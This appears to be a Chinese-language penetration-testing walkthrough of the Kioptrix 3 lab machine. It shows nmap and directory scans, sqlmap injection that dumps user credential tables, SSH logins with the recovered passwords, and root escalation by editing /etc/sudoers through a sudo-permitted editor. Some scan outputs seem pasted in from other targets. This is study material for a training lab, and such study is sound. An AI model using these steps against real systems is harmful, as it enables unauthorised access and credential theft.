Overview| Name | Template |

薄弱点1. 字典及信息收集技能薄弱

Nmap扫描```bash

ports=$(nmap -p- –min-rate=1000 -T4 192.168.150.129 | grep -oE ‘(^[0-9][^/tcp]*)’ | tr ‘\n’ ‘,’)
nmap -p$ports -sV -sC -O 192.168.150.129 -oN nmap.txt

第一行代码使用nmap命令扫描本地主机的所有端口（从1到65535），–min-rate=1000参数表示每秒发送最少1000个包，-T4参数表示设置扫描速度为快速扫描模式。

grep -oE ‘(^[0-9][^/tcp]*)’用于提取输出结果中的端口号，tr ‘\n’ ‘,’用于将提取的端口号按逗号分隔并拼接成一个字符串。

第二行代码使用nmap命令再次扫描指定的端口，-p$ports参数表示扫描之前提取的端口列表，-sV参数表示进行服务版本检测，-sC参数表示在扫描过程中使用默认脚本进行常见漏洞探测，-O参数表示进行操作系统版本检测，-oN nmap.txt参数表示将扫描结果保存到名为nmap.txt的文件中。

```bash
┌──(root㉿kill3r)-[/home/kill3r]
└─# ports=$(nmap -p- --min-rate=1000 -T4 192.168.150.129 | grep -oE '(^[0-9][^/tcp]*)' | tr '\n' ',')
┌──(root㉿kill3r)-[/home/kill3r]
└─# nmap -p$ports -sV -sC -O 192.168.150.129 -oN nmap.txt
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-26 10:11 CST
Nmap scan report for kioptrix3.com (192.168.150.129)
Host is up (0.00044s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey:
| 1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
|_ 2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-title: Ligoat Security - Got Goat? Security ...
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
MAC Address: 00:0C:29:9F:D9:FA (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.67 seconds

枚举### SMB 枚举> Port: 139 389 445 636

enum4linux -a/-A 127.0.0.1

1	$ enum4linux -A <ip>

MSF-SMB

# 基于SMB协议扫描版本号
msf6 > use auxiliary/scanner/smb/smb_version
# 扫描共享文件
msf6 > use auxiliary/scanner/smb/smb_enumshares
# 基于SMB进行用户信息枚举
msf6 > use auxiliary/scanner/smb/smb_lookupsid

Web> HTTP Web Server, Port Like: 80 443 81 8080 8443 4443 8081

Finger:获取有关特定用户或系统上的用户列表和配置信息

`whatweb````bash

用于识别和分析目标网站的技术栈、CMS（内容管理系统）、插件、框架和其他与网站相关的信息。通过分析网站的响应和页面内容

┌──(root㉿kill3r)-[~]
└─# whatweb 192.168.150.129
http://192.168.150.129 [200 OK] Apache[2.4.46], Bootstrap, Country[RESERVED][ZZ], HTML5, HTTPServer[Debian Linux][Apache/2.4.46 (Debian)], IP[192.168.150.129], Script[text/javascript]

- 目录枚举
`dirb http://192.168.150.129`
`dirsearch -u http://192.168.150.129 -r`
`gobuster dir -w ... -u http://192.168.150.129 -x html,php,js,bak`
```bash
┌──(root㉿kill3r)-[~]
└─# gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://192.168.150.129 -x html,php,js,bak
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.150.129
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: html,php,js,bak
[+] Timeout: 10s
===============================================================
2023/08/03 22:01:51 Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/index.html (Status: 200) [Size: 1620]
/profile.php (Status: 200) [Size: 1473]
/javascript.js (Status: 200) [Size: 0]
/javascript (Status: 301) [Size: 321] [--> http://192.168.150.129/javascript/]
/exploit.html (Status: 200) [Size: 279]
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/server-status (Status: 403) [Size: 279]
Progress: 1099312 / 1102805 (99.68%)===============================================================
2023/08/03 22:03:22 Finished
===============================================================

漏洞扫描

1 2	$ nikto -h http://www.example.com/ $ nuclei -u https://example.com/

wordlist- cewl.list:

cewl http://192.168.150.129/ -w cewl.txt

now
Post
comment
Name
Website
Remember
Administration
Username
Password
Proudly
Powered
Adminstration

pass.list

1
2
3

n0t7t1k4
Mast3r
starwars

user.list

1
2
3

admin
dreg
loneferret

hash.list

1
2
3

```
- information.list
```bash

复现过程### 访问靶场,寻找功能点

进入博客后发现图片全部乱码,F12打开后查看网络,发现是请求的网址,那我们改一下hosts文件,将IP指向这个域名
页面返回正常,查询是否为常见CMS,未查询到,寻找SQL注入点,在一处排序功能点可以选择ID排序,然后判断是否存在注入

信息分析#### SQL注入

出现了SQL报错,丢到SQLMap中,可以手注哈

┌──(root㉿kali)-[/opt/vulnhub/0x03]
└─# sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1%27&sort=filename#photos~" -p id --dbs
┌──(root㉿kali)-[/opt/vulnhub/0x03]
└─# sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1%27&sort=filename#photos~" -p id -D gallery --tables
┌──(root㉿kali)-[/opt/vulnhub/0x03]
└─# sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1%27&sort=filename#photos~" -p id -D gallery --dump
Database: gallery
Table: dev_accounts
[2 entries]
+----+---------------------------------------------+------------+
| id | password | username |
+----+---------------------------------------------+------------+
| 1 | 0d3eccfb887aabd50f243b3f155c0f85 (Mast3r) | dreg |
| 2 | 5badcaf789d3d1d09794d8f021f40f0e (starwars) | loneferret |
+----+---------------------------------------------+------------+
Database: gallery
Table: gallarific_users
[1 entry]
+--------+---------+---------+---------+----------+----------+----------+----------+-----------+-----------+------------+-------------+
| userid | email | photo | website | joincode | lastname | password | username | usertype | firstname | datejoined | issuperuser |
+--------+---------+---------+---------+----------+----------+----------+----------+-----------+-----------+------------+-------------+
| 1 | <blank> | <blank> | <blank> | <blank> | User | n0t7t1k4 | admin | superuser | Super | 1302628616 | 1 |
+--------+---------+---------+---------+----------+----------+----------+----------+-----------+-----------+------------+-------------+

尝试密码碰撞用得到的帐号密码尝试登录CMS后台或者ssh服务.

┌──(root㉿kali)-[/opt/vulnhub/0x03]
└─# ssh dreg@192.168.150.129
Unable to negotiate with 192.168.150.129 port 22: no matching host key type found. Their offer: ssh-rsa,ssh-dss
# 这个错误是由于SSH客户端与SSH服务器之间的密钥类型不匹配导致的。根据错误提示，服务器提供的密钥类型是ssh-rsa和ssh-dss，但客户端无法与之匹配,并且OpenSSH 7.0 版本之后已经删除了ssh-dss，默认不再支持它
# 通过在SSH命令中使用 -o 选项来指定所需的密钥类型
┌──(root㉿kali)-[/opt/vulnhub/0x03]
└─# ssh -o HostKeyAlgorithms=ssh-rsa dreg@192.168.150.129
┌──(root㉿kali)-[/opt/vulnhub/0x03]
└─# ssh -o HostKeyAlgorithms=ssh-rsa loneferret@192.168.150.129

系统信息收集#### Shell as dreg```bash

history
dreg@Kioptrix3:~$ ll -a
-rbash: /usr/bin/python: restricted: cannot specify `/‘ in command names

bash好像有问题

#### Shell as loneferret```bash
1. history
2. loneferret@Kioptrix3:~$ ls
checksec.sh CompanyPolicy.README
3. loneferret@Kioptrix3:~$ ./checksec.sh --help
Usage: checksec [OPTION]
Options:
--file <executable-file>
--dir <directory> [-v]
--proc <process name>
--proc-all
--proc-libs <process ID>
--kernel
--fortify-file <executable-file>
--fortify-proc <process ID>
--version
--help
For more information, see:
http://www.trapkit.de/tools/checksec.html
# 感觉没啥用
4. loneferret@Kioptrix3:~$ sudo -l
User loneferret may run the following commands on this host:
(root) NOPASSWD: !/usr/bin/su
(root) NOPASSWD: /usr/local/bin/ht
# sudo发现了ht编辑器似乎可以提权

loneferret@Kioptrix3:~$ export TERM=xterm
loneferret@Kioptrix3:~$ sudo ht
# 打开/etc/sudoers
# 底下就是命令 f3打开 f2保存
# User privilege specification
│root ALL=(ALL) ALL
│loneferret ALL=NOPASSWD: !/usr/bin/su, /usr/local/bin/ht,/bin/bash
# f10保存退出

loneferret@Kioptrix3:~$ sudo -l
User loneferret may run the following commands on this host:
(root) NOPASSWD: !/usr/bin/su
(root) NOPASSWD: /usr/local/bin/ht
(root) NOPASSWD: /bin/bash
loneferret@Kioptrix3:~$ sudo bash
root@Kioptrix3:~# id
uid=0(root) gid=0(root) groups=0(root)
root@Kioptrix3:~# whoami
root